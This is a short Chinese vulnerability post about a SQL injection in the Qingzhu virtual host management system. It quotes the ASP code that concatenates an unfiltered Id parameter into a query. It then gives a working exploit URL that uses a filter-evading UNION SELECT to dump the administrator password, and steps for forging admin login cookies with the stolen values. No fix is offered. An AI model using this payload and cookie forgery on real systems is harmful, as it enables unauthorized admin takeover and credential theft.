清竹虚拟主机管理系统sql注入漏洞

清竹虚拟主机管理系统sql注入漏洞
NCompany\Index.asp
[php]
loadfile_fromcache templatePath&"NCompany-Index.html" '加载index.html模板
TempCon=TempCon&Application("Qz_TP_"&templatePath&"NCompany-Index.html")
Id=ReStrs(Request.QueryString("Id"))//过滤不严格
Set rs=Conn.Execute("Select * From [Qz_NComPany] Where [Id]="&Id)//直接带入sql语句
Address=rs("Address")
TelInfo=rs("TelInfo")
[/php]
exp:
[php]ncompany/index.asp?id=1%09union%09%se%lect%091,2,3,4,5,adminpass,7,8,9,10,11%09from%09adminuser%09where%09id=1[/php]
构造cookie:
[php]
AdminUser = 注入得来的adminuser
PassWord = 注入得来的adminpass[/php]

发表评论